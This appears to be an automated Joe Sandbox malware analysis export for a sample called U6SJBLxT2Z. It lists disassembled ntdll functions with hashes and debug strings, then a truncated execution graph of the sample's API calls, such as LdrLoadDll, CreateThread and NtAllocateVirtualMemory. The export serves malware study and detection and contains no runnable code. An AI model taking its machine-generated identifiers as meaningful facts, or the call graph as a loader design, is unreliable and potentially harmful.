                                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                  • API String ID: 3446177414-3224558752
                                                                                                                                                                                                  • Opcode ID: 36e6df5814735aeb9ccf23838b1d0072e8fe481875cf0cb3912cf676a577aad8
                                                                                                                                                                                                  • Instruction ID: d3cfb86eeac39485f8552ef559a5d02375daa10687c164d720cff6755280c7d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e6df5814735aeb9ccf23838b1d0072e8fe481875cf0cb3912cf676a577aad8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641483D604704EFEB11CF68C844B59B7A4FF51368F0485ACE919973D1CB79A980CB91
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • HEAP: , xrefs: 3293ECDD
                                                                                                                                                                                                  • ---------------------------------------, xrefs: 3293EDF9
                                                                                                                                                                                                  • Entry Heap Size , xrefs: 3293EDED
                                                                                                                                                                                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3293EDE3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                  • API String ID: 3446177414-1102453626
                                                                                                                                                                                                  • Opcode ID: 5a39f0d721dbb5d7c7c350f0097e8272c2781dc206769251282d4e84afce4223
                                                                                                                                                                                                  • Instruction ID: a3a1d93f8cf79939b8114ebece4eeae33aa1fd44a54a87d7220e5b765b9f32a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a39f0d721dbb5d7c7c350f0097e8272c2781dc206769251282d4e84afce4223
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F541C139A06215DFE716CF18C884A6ABBF9FF4535472984A9D954EB311DB31EC82CBC0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                  • API String ID: 3446177414-1222099010
                                                                                                                                                                                                  • Opcode ID: 27397a2a4afb647db71a791364f92179d490a9d96841a7290db9746c569a438a
                                                                                                                                                                                                  • Instruction ID: bf74b386aeda9f425f5e224240875e7c718b1f0cf6db2f98ce66184897e749a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27397a2a4afb647db71a791364f92179d490a9d96841a7290db9746c569a438a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8831473D105784FFFB26CB28C804F5977E4EF05758F044488E819977A1CBBAD980CA51
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                  • API String ID: 3446177414-1194432280
                                                                                                                                                                                                  • Opcode ID: bd7e82687ce6f29d8fe07e0a6eb28c262c01485b67fa5f356257e319bc7f222d
                                                                                                                                                                                                  • Instruction ID: 95da46d27917edbea0d104b31a1165bf50bf7c79ff0704cf5dd26cdfcd546afb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd7e82687ce6f29d8fe07e0a6eb28c262c01485b67fa5f356257e319bc7f222d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7813CB9D012699BDB25CF54CC44BEEB7B8AF08714F0041EAA91DB7250DB709E85CFA1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 32903439
                                                                                                                                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 3290344A, 32903476
                                                                                                                                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 32903466
                                                                                                                                                                                                  • LdrpFindDllActivationContext, xrefs: 32903440, 3290346C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                  • API String ID: 3446177414-3779518884
                                                                                                                                                                                                  • Opcode ID: 8261b0ccca700e751fc27b66d4c8ff4428e07c593dcafa85c00cafc9a8480724
                                                                                                                                                                                                  • Instruction ID: dc369a77446e489c8b6a47a95f5c7bf64ec817212611d1bb32d637af5f0a6feb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8261b0ccca700e751fc27b66d4c8ff4428e07c593dcafa85c00cafc9a8480724
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D331D5BEA00375AFF7119B04C884B65F2A4BB45398F468166DD0A67271DBB0DDC0C6B5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                  • API String ID: 3446177414-3610490719
                                                                                                                                                                                                  • Opcode ID: 629dd43e8402d1a7dc69fa4634e887b35f738cb45f218832ab42d14eaf72335a
                                                                                                                                                                                                  • Instruction ID: e66c85ca6eb61895a8fc50518515baefa055f8e6c5a296cfe5d911993166ba78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 629dd43e8402d1a7dc69fa4634e887b35f738cb45f218832ab42d14eaf72335a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC91237D204741AFE31ACF28CC80B2AB7A5FF95758F400459E9599B292EF74E841CB92
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 328F9F1C
                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 328F9F2E
                                                                                                                                                                                                  • LdrpCheckModule, xrefs: 328F9F24
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                  • API String ID: 3446177414-161242083
                                                                                                                                                                                                  • Opcode ID: e3b64e80276a8ab6d0baa5f737e52ed66c5b7604c6333ecb6369a9dc04aee440
                                                                                                                                                                                                  • Instruction ID: bb85d1cdf08f2b228751ece1dc8bfca291409ae73112768ac5e0ed97ce6b37a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3b64e80276a8ab6d0baa5f737e52ed66c5b7604c6333ecb6369a9dc04aee440
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F71B379A042099FEF04DF68C950BAEB7F4EF44308F18446DD919EB750E775A982CB50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 89af0d3b4e60d012b418a6c261b37d9915d5df47bb8235aaa2815a74d4f64da9
                                                                                                                                                                                                  • Instruction ID: 471ed6adde369d201fd922c1dade6c78e871fb21c8e4b4a32d02d6dca37e987b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89af0d3b4e60d012b418a6c261b37d9915d5df47bb8235aaa2815a74d4f64da9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 13E1EC79900308DFEB25CFA9D980A9DBBF5BF58304F10492EE85AA7760DB71A941CF50
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3446177414-0
                                                                                                                                                                                                  • Opcode ID: 3a3c2f2477ec2ce7668238ce8cd1932f56c2a46cf8feec543164616673ddff13
                                                                                                                                                                                                  • Instruction ID: 7e740af41d6c95a7cf9bef70932d1c02bcf1b1ff53ee4b40310e89f6e514c1e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a3c2f2477ec2ce7668238ce8cd1932f56c2a46cf8feec543164616673ddff13
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F517B787056129FEB18CE18C8A0A39B7E9FF8E368B15416DD906DB720DB71EC41CB80
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4281723722-0
                                                                                                                                                                                                  • Opcode ID: bc36c4ef1eaf2e16db724ac0ccab4acab1cb5d3440a38e2fbf1178f54c009aac
                                                                                                                                                                                                  • Instruction ID: fdd969d4e555f66317ebb3c8d72fce67d960873c18d4098201db40ec9c80574a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc36c4ef1eaf2e16db724ac0ccab4acab1cb5d3440a38e2fbf1178f54c009aac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F314475E45258EFEF04DFA8D844AADBBF0BB48320F14896AE911B7390DB319941CF54
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                  • Opcode ID: 0dad5e986ecef4eb652a0a7f1f4db51e6f5bdadfc1d36976cc934d802dd1afce
                                                                                                                                                                                                  • Instruction ID: 90775cd558698f9f07767ff75f102794cf75f83b2e88b6bdb1b852b85637ed33
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dad5e986ecef4eb652a0a7f1f4db51e6f5bdadfc1d36976cc934d802dd1afce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F325978D05369DFEB25CF68C884BDDBBB4BB08304F0041E9D459A7641DBB95A88CF90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: 0$Flst
                                                                                                                                                                                                  • API String ID: 0-758220159
                                                                                                                                                                                                  • Opcode ID: e87a09dfcacf57dc81fca3d81eb9ae2378654c78e0fc9ffeb1fc9377205cc53a
                                                                                                                                                                                                  • Instruction ID: bb27bd4322f23565b5e61314289263272ba9cdc684baa39c2136a9e93a79261b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e87a09dfcacf57dc81fca3d81eb9ae2378654c78e0fc9ffeb1fc9377205cc53a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93517CB9E012588FEB24CF95C88475DFBF4EF44754F54C42AD44A9B250EBB0D985CB90
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.12033758013.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.12033758013.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_32860000_U6SJBLxT2Z.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                                  • String ID: 0$0
                                                                                                                                                                                                  • API String ID: 3446177414-203156872
                                                                                                                                                                                                  • Opcode ID: b8a13d279a5450730a7056ebabb6a6af084a36635969f322b23ba10ba678d3df
                                                                                                                                                                                                  • Instruction ID: ad1c0269f0225c374350c30d9b8d24b63218c2a9c8d79d6c072298e2a14e691a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8a13d279a5450730a7056ebabb6a6af084a36635969f322b23ba10ba678d3df
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF418DBA6087059FD300CF28C444A5ABBE4FF89358F044A6EF898DB711D771EA05CB96
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:3.5%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                                                                                  Signature Coverage:1.8%
                                                                                                                                                                                                  Total number of Nodes:928
                                                                                                                                                                                                  Total number of Limit Nodes:117
                                                                                                                                                                                                  execution_graph 79826 30b9880 79827 30b988f 79826->79827 79832 30d06f0 79827->79832 79829 30b98d0 79830 30b98aa 79830->79829 79831 30b98bd CreateThread 79830->79831 79833 30d06fe 79832->79833 79834 30d070a 79832->79834 79833->79834 79837 30d0b70 LdrLoadDll 79833->79837 79834->79830 79836 30d085c 79836->79830 79837->79836 79838 30ce700 79841 30cd380 79838->79841 79842 30cd3a6 79841->79842 79851 30c3f80 79842->79851 79844 30cd3fd 79845 30cd43d 79844->79845 79846 30c3f80 LdrLoadDll 79844->79846 79856 30c7160 79845->79856 79846->79845 79848 30cd521 79849 30cd528 79848->79849 79861 30cd060 79848->79861 79852 30c3fa5 79851->79852 79855 30c3fb0 79852->79855 79884 30c3ec0 79852->79884 79854 30c3ff8 79854->79844 79855->79844 79857 30d06f0 LdrLoadDll 79856->79857 79858 30c7181 79857->79858 79859 30c7193 79858->79859 79860 30c7188 GetFileAttributesW 79858->79860 79859->79848 79860->79859 79862 30cd083 79861->79862 79889 30d18a0 79862->79889 79864 30cd0e5 79864->79848 79865 30cd090 79865->79864 79866 30cd0af 79865->79866 79867 30cd0f1 79865->79867 79868 30cd0d4 79866->79868 79869 30cd0b7 79866->79869 79873 30c3f80 LdrLoadDll 79867->79873 79871 30d6b40 2 API calls 79868->79871 79932 30d6b40 79869->79932 79871->79864 79874 30cd113 79873->79874 79927 30cc3a0 79874->79927 79876 30cd135 79880 30cd238 79876->79880 79881 30cd14d 79876->79881 79877 30cd21f 79878 30d6b40 2 API calls 79877->79878 79879 30cd343 79878->79879 79879->79848 79880->79877 79936 30cc9c0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 79880->79936 79881->79877 79935 30cc9c0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 79881->79935 79885 30c3ee4 79884->79885 79888 30d3f20 LdrLoadDll 79885->79888 79887 30c3f1e 79887->79854 79888->79887 79890 30d18ae 79889->79890 79891 30d18b5 79889->79891 79890->79865 79937 30c3ca0 79891->79937 79894 30d18f9 79898 30d1aef 79894->79898 79941 30d6c20 79894->79941 79897 30d1912 79897->79898 79899 30d1a9a 79897->79899 79900 30d1927 79897->79900 79898->79865 79901 30d1aa4 79899->79901 79925 30d1a2c 79899->79925 79945 30cc4c0 LdrLoadDll 79900->79945 79946 30cc4c0 LdrLoadDll 79901->79946 79904 30d6b40 2 API calls 79904->79898 79905 30d193e 79909 30d06f0 LdrLoadDll 79905->79909 79906 30d1abb 79947 30d0c40 LdrLoadDll 79906->79947 79908 30d1ad1 79911 30d06f0 LdrLoadDll 79908->79911 79910 30d195a 79909->79910 79912 30d06f0 LdrLoadDll 79910->79912 79911->79898 79913 30d1976 79912->79913 79914 30d06f0 LdrLoadDll 79913->79914 79915 30d1995 79914->79915 79916 30d06f0 LdrLoadDll 79915->79916 79917 30d19b1 79916->79917 79918 30d06f0 LdrLoadDll 79917->79918 79919 30d19cd 79918->79919 79920 30d06f0 LdrLoadDll 79919->79920 79921 30d19ec 79920->79921 79922 30d06f0 LdrLoadDll 79921->79922 79923 30d1a08 79922->79923 79924 30d06f0 LdrLoadDll 79923->79924 79924->79925 79925->79904 79926 30d1a91 79925->79926 79926->79865 79929 30cc3b6 79927->79929 79928 30cc3c0 79928->79876 79929->79928 79930 30d6b40 2 API calls 79929->79930 79931 30cc3f9 79930->79931 79931->79876 79956 30d5030 79932->79956 79934 30cd0c8 79934->79848 79935->79881 79936->79880 79938 30c3cc4 79937->79938 79939 30c3ccb 79938->79939 79940 30c3d00 LdrLoadDll 79938->79940 79939->79894 79944 30d1370 LdrLoadDll 79939->79944 79940->79939 79948 30d4fe0 79941->79948 79943 30d6c3b 79943->79897 79944->79894 79945->79905 79946->79906 79947->79908 79949 30d4ffa 79948->79949 79952 30d5d30 79949->79952 79951 30d500b RtlAllocateHeap 79951->79943 79953 30d5da5 79952->79953 79954 30d5d3f 79952->79954 79953->79951 79954->79953 79955 30d06f0 LdrLoadDll 79954->79955 79955->79953 79957 30d504d 79956->79957 79958 30d5d30 LdrLoadDll 79957->79958 79959 30d505e RtlFreeHeap 79958->79959 79959->79934 79960 30cf580 79961 30cf5a8 79960->79961 79962 30c3f80 LdrLoadDll 79961->79962 79963 30cf5e2 79962->79963 79989 30c57a0 79963->79989 79965 30cf60f 79966 30cf608 79966->79965 79967 30c3f80 LdrLoadDll 79966->79967 79968 30cf64b 79967->79968 79969 30c3f80 LdrLoadDll 79968->79969 79970 30cf680 79969->79970 80000 30c58b0 79970->80000 79972 30cf6a4 79973 30cf87a 79972->79973 79974 30cf6e6 79972->79974 80004 30cf2d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 79972->80004 79976 30c3f80 LdrLoadDll 79974->79976 79977 30cf717 79976->79977 79978 30c58b0 2 API calls 79977->79978 79981 30cf73b 79978->79981 79979 30cf781 79980 30c58b0 2 API calls 79979->79980 79985 30cf7b1 79980->79985 79981->79973 79981->79979 80005 30cf2d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 79981->80005 79983 30cf7f7 79986 30c58b0 2 API calls 79983->79986 79985->79973 79985->79983 80006 30cf2d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 79985->80006 79987 30cf856 79986->79987 79987->79973 80007 30cf2d0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 79987->80007 79990 30c57d3 79989->79990 80008 30d48c0 79990->80008 79993 30c57f7 79993->79966 79997 30c5832 80022 30d4d20 79997->80022 79999 30c589a 79999->79966 80001 30c58d5 80000->80001 80002 30c5949 80001->80002 80027 30d4700 80001->80027 80002->79972 80004->79974 80005->79979 80006->79983 80007->79973 80009 30d48da 80008->80009 80010 30d5d30 LdrLoadDll 80009->80010 80011 30c57f0 80010->80011 80011->79993 80012 30d4910 80011->80012 80013 30d492d 80012->80013 80014 30d5d30 LdrLoadDll 80013->80014 80015 30d493e 80014->80015 80026 5122bc0 LdrInitializeThunk 80015->80026 80016 30c581a 80016->79993 80018 30d5220 80016->80018 80019 30d523a 80018->80019 80020 30d5d30 LdrLoadDll 80019->80020 80021 30d524b 80020->80021 80021->79997 80023 30d4d3d 80022->80023 80024 30d5d30 LdrLoadDll 80023->80024 80025 30d4d4e NtClose 80024->80025 80025->79999 80026->80016 80028 30d471d 80027->80028 80029 30d5d30 LdrLoadDll 80028->80029 80030 30d472e 80029->80030 80033 5122b80 LdrInitializeThunk 80030->80033 80031 30d4751 80031->80002 80033->80031 80034 30caf80 80035 30cafa8 80034->80035 80036 30d6c20 2 API calls 80035->80036 80038 30cb008 80036->80038 80037 30cb011 80038->80037 80065 30ca2e0 80038->80065 80040 30cb05a 80043 30cb078 80040->80043 80097 30cce10 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 80040->80097 80041 30cb03a 80041->80040 80095 30ca630 LdrLoadDll 80041->80095 80050 30cb092 80043->80050 80099 30c3df0 LdrLoadDll 80043->80099 80044 30cb048 80044->80040 80096 30cacb0 LdrLoadDll RtlFreeHeap 80044->80096 80047 30cb06c 80098 30cce10 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 80047->80098 80051 30ca2e0 4 API calls 80050->80051 80052 30cb0bf 80051->80052 80053 30cb0e0 80052->80053 80100 30ca630 LdrLoadDll 80052->80100 80054 30cb0fe 80053->80054 80102 30cce10 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 80053->80102 80057 30cb118 80054->80057 80104 30c3df0 LdrLoadDll 80054->80104 80061 30d6b40 2 API calls 80057->80061 80058 30cb0ce 80058->80053 80101 30cacb0 LdrLoadDll RtlFreeHeap 80058->80101 80059 30cb0f2 80103 30cce10 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 80059->80103 80064 30cb122 80061->80064 80066 30ca378 80065->80066 80067 30c3f80 LdrLoadDll 80066->80067 80068 30ca43e 80067->80068 80069 30c3f80 LdrLoadDll 80068->80069 80070 30ca46a 80069->80070 80071 30c58b0 2 API calls 80070->80071 80072 30ca48f 80071->80072 80073 30ca5d9 80072->80073 80113 30d47b0 80072->80113 80075 30ca5ed 80073->80075 80105 30c9c50 80073->80105 80075->80041 80078 30ca5cf 80079 30d4d20 2 API calls 80078->80079 80079->80073 80080 30ca4c8 80081 30d4d20 2 API calls 80080->80081 80082 30ca502 80081->80082 80119 30d6d00 LdrLoadDll 80082->80119 80084 30ca53b 80084->80075 80085 30c58b0 2 API calls 80084->80085 80086 30ca561 80085->80086 80086->80075 80087 30d47b0 2 API calls 80086->80087 80088 30ca586 80087->80088 80089 30ca58d 80088->80089 80090 30ca5b9 80088->80090 80092 30d4d20 2 API calls 80089->80092 80091 30d4d20 2 API calls 80090->80091 80093 30ca5c3 80091->80093 80094 30ca597 80092->80094 80093->80041 80094->80041 80095->80044 80096->80040 80097->80047 80098->80043 80099->80050 80100->80058 80101->80053 80102->80059 80103->80054 80104->80057 80106 30c9c75 80105->80106 80107 30c3f80 LdrLoadDll 80106->80107 80108 30c9d57 80107->80108 80109 30c3f80 LdrLoadDll 80108->80109 80110 30c9d8f 80109->80110 80111 